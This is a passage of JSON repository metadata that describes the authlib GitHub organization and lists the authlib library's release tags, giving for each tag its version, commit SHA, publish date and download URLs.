servers.","email":null,"website":"https://authlib.org/","location":"Japan","twitter":"authlib","company":null,"icon_url":"https://avatars.githubusercontent.com/u/32964472?v=4","repositories_count":12,"last_synced_at":"2026-04-03T07:12:35.268Z","metadata":{"has_sponsors_listing":true,"funding":{"github":["authlib","lepture"]}},"html_url":"https://github.com/authlib","funding_links":["https://github.com/sponsors/authlib","https://github.com/sponsors/lepture"],"total_stars":6979,"followers":74,"following":0,"created_at":"2022-11-06T14:13:52.360Z","updated_at":"2026-04-03T07:12:35.268Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authlib/repositories"},"tags":[{"name":"v1.7.0","sha":"5d2e603ec5f10bd2c4bf20e2495c076370d65b74","kind":"commit","published_at":"2026-04-18T10:59:19.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.7.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.7.0/manifests"},{"name":"v1.6.11","sha":"0dc0e5b4dc84f155319518a3732113af6fa47525","kind":"tag","published_at":"2026-04-16T07:18:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.11","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.11/manifests"},{"name":"v1.6.10","sha":"ef09aebbba4439dedb22bd15777d1b3458b6f0ab","kind":"commit","published_at":"2026-04-13T13:29:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.10","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.10/manifests"},{"name":"v1.6.9","sha":"9266eaa2227ad7e21dc731b2a4a01909aabd934b","kind":"commit","published_at":"2026-03-02T07:42:53.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.9","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.9/manifests"},{"name":"v1.6.8","sha":"a769f343ae8d43236448e3e74445980861812e82","kind":"commit","published_at":"2026-02-14T04:01:10.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.8","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.8/manifests"},{"name":"v1.6.7","sha":"38e872a3f5b97d2658507acc8762a4e18adaa50e","kind":"commit","published_at":"2026-02-06T14:02:52.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.7","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.7/manifests"},{"name":"v1.6.6","sha":"bb7a315befbad333faf9a23ef574d6e3134a6774","kind":"commit","published_at":"2025-12-12T07:59:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.6","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.6/manifests"},{"name":"v1.6.5","sha":"9ec42561cd1a81b518598d252f8adbcf446f7419","kind":"commit","published_at":"2025-10-02T13:31:28.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.5","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.5/manifests"},{"name":"v1.6.4","sha":"09a51855747c13771a74958e233a6bf1fd143741","kind":"commit","published_at":"2025-09-17T09:58:16.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.4","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.4/manifests"},{"name":"v1.6.3","sha":"dbbfa9abcfe725001b452cf08d9e48be0ebfdce9","kind":"tag","published_at":"2025-08-26T12:04:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.3","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.3/manifests"},{"name":"v1.6.2","sha":"3385fbf804f0c32ccfadf21611cf893aabc1b0c0","kind":"tag","published_at":"2025-08-23T08:28:25.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.2/manifests"},{"name":"v1.6.1","sha":"ef3d5733198570b8cff7a0b4f41988cfe9cf2b69","kind":"commit","published_at":"2025-07-20T07:37:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.1/manifests"},{"name":"v1.6.0","sha":"fe87a117f941975793bf4063e9b08b90e88b230a","kind":"tag","published_at":"2025-05-22T12:58:35.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.6.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.6.0/manifests"},{"name":"v1.5.2","sha":"fb698d796e4b39fd1bbfd008181bfa8cea33c67b","kind":"tag","published_at":"2025-04-02T10:30:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"4eafdc21891e78361f478479efe109ff0fb2f661","kind":"tag","published_at":"2025-02-28T14:43:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"2d0396e3fc49d53ab816bb43ec83fe42d527ca09","kind":"tag","published_at":"2025-02-25T09:53:21.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.5.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"0e8f480e9c9a91ab3dc8017de70f59014e66664d","kind":"commit","published_at":"2025-01-28T13:04:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"eb34edfc8b1fdaae51a91d4686ebb34395e5082c","kind":"commit","published_at":"2024-12-20T07:26:03.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.4.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.4.0/manifests"},{"name":"v1.3.2","sha":"d7db2c33226983648b91e3ec0d9cf2e43dc480d4","kind":"commit","published_at":"2024-08-24T05:08:50.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.2","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.2/manifests"},{"name":"v1.3.1","sha":"df226ab587c453029ef5083a7e1c5dc6772647dd","kind":"commit","published_at":"2024-06-04T02:38:10.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.1/manifests"},{"name":"v1.3.0","sha":"a7d68b4c3b8a3a7fe0b62943b5228669f2f3dfec","kind":"commit","published_at":"2023-12-17T07:55:15.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.3.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"a18d0a5ad183eb58b4db7479f3f7da71398a8667","kind":"commit","published_at":"2023-06-25T12:52:53.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"7575ea336c58ff3d206a62a94f1c01a0e594cba4","kind":"commit","published_at":"2022-12-06T08:34:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.2.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.2.0/manifests"},{"name":"v0.15.6","sha":"0694276d9d9ec66b3d1db8d147f1c2afa4e30483","kind":"commit","published_at":"2022-11-01T12:54:52.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.6/manifests"},{"name":"v1.1.0","sha":"2a8a22630f098b276a535c30b628380f0a9646b1","kind":"commit","published_at":"2022-09-09T16:10:07.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.1.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"2e721aa0c158f7d7bac96bc75f7c6d31a939007d","kind":"commit","published_at":"2022-04-06T11:52:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"c73e2a8921a15ee1f96b604123e49bd2d5fd651b","kind":"commit","published_at":"2022-03-15T10:10:57.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v1.0.0","html_url":"https://github.com/authlib/authlib/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v1.0.0/manifests"},{"name":"v0.15.5","sha":"d8e428c9350c792fc3d25dbaaffa3bfefaabd8e3","kind":"commit","published_at":"2021-10-18T12:08:43.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.5/manifests"},{"name":"v0.15.4","sha":"45701441996b18452523105112d018c0f5f43a18","kind":"commit","published_at":"2021-06-05T07:07:38.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.4/manifests"},{"name":"v0.15.3","sha":"33aab0272d7c8a857c851f49a32c6d374930549a","kind":"commit","published_at":"2021-01-15T13:51:55.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.3/manifests"},{"name":"v0.15.2","sha":"1969b567733f6426e5a8e20c5edf3371e9d23e5c","kind":"commit","published_at":"2020-10-18T06:35:01.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.2/manifests"},{"name":"v0.15.1","sha":"c70a805145db56a0909d583bdb70773732578c68","kind":"commit","published_at":"2020-10-14T12:56:02.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15.1/manifests"},{"name":"v0.15","sha":"4e501ce3e58e2daaaba0b82018b047bb61741f0c","kind":"commit","published_at":"2020-10-10T06:53:45.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.15","html_url":"https://github.com/authlib/authlib/releases/tag/v0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.15/manifests"},{"name":"v0.14.3","sha":"ffdc4378a2b0c8e6627170396384d1bfcfb7ed40","kind":"commit","published_at":"2020-05-18T13:54:54.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.3/manifests"},{"name":"v0.14.2","sha":"ce8b46b9e64ab799587b0a577cf122c1523c69a6","kind":"commit","published_at":"2020-05-06T00:54:33.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.2/manifests"},{"name":"v0.14.1","sha":"8e8786bd2b0308d82438ef8a9424765a1777bfce","kind":"commit","published_at":"2020-02-12T04:39:08.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14.1/manifests"},{"name":"v0.14","sha":"25e7fe4803af94b4b4057920a854fb6d0994ac78","kind":"commit","published_at":"2020-02-11T14:11:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.14","html_url":"https://github.com/authlib/authlib/releases/tag/v0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.14/manifests"},{"name":"v0.13","sha":"442da0bfd11673ab5049ed8c8b53341c35b4aaca","kind":"commit","published_at":"2019-11-11T11:32:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.13","html_url":"https://github.com/authlib/authlib/releases/tag/v0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.13/manifests"},{"name":"v0.12.1","sha":"1475dedabe610be442f89027c24b6de09a0c6610","kind":"commit","published_at":"2019-09-12T08:26:58.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12.1/manifests"},{"name":"v0.12","sha":"19395bdfc99bba69acce4ff7ff726df7ed794813","kind":"commit","published_at":"2019-09-03T12:11:13.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.12","html_url":"https://github.com/authlib/authlib/releases/tag/v0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.12/manifests"},{"name":"v0.11","sha":"5403f90a0a910b1519622a2b97e03f0b9cce36e4","kind":"commit","published_at":"2019-04-06T05:00:23.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.11","html_url":"https://github.com/authlib/authlib/releases/tag/v0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.11/manifests"},{"name":"v0.10","sha":"19bc7cabe8f5bd8a4503cf8681d75c36fed419b8","kind":"commit","published_at":"2018-10-12T02:22:42.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.10","html_url":"https://github.com/authlib/authlib/releases/tag/v0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.10/manifests"},{"name":"v0.9","sha":"abf4555fa6b0d8cf64c31b2c4c90fb5d875c2de8","kind":"commit","published_at":"2018-08-12T04:38:51.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.9","html_url":"https://github.com/authlib/authlib/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.9/manifests"},{"name":"v0.8","sha":"a0226e08943aab25b423f2e7d9bc9a903faeb459","kind":"commit","published_at":"2018-06-17T04:49:14.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.8","html_url":"https://github.com/authlib/authlib/releases/tag/v0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.8/manifests"},{"name":"v0.7","sha":"aea225d3a2556a36025dc48742470317cee8e728","kind":"commit","published_at":"2018-04-28T07:14:47.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.7","html_url":"https://github.com/authlib/authlib/releases/tag/v0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.7/manifests"},{"name":"v0.6","sha":"0008acb2985087adae5855812ff5559a1ea0dd9a","kind":"commit","published_at":"2018-03-20T12:36:34.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.6","html_url":"https://github.com/authlib/authlib/releases/tag/v0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.6/manifests"},{"name":"v0.5.1","sha":"4fd0929fba4a91b304ee16f1a870fa7064e0af8e","kind":"commit","published_at":"2018-02-11T13:09:41.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5.1","tag_url":"https://repos.ecosyste.ms/a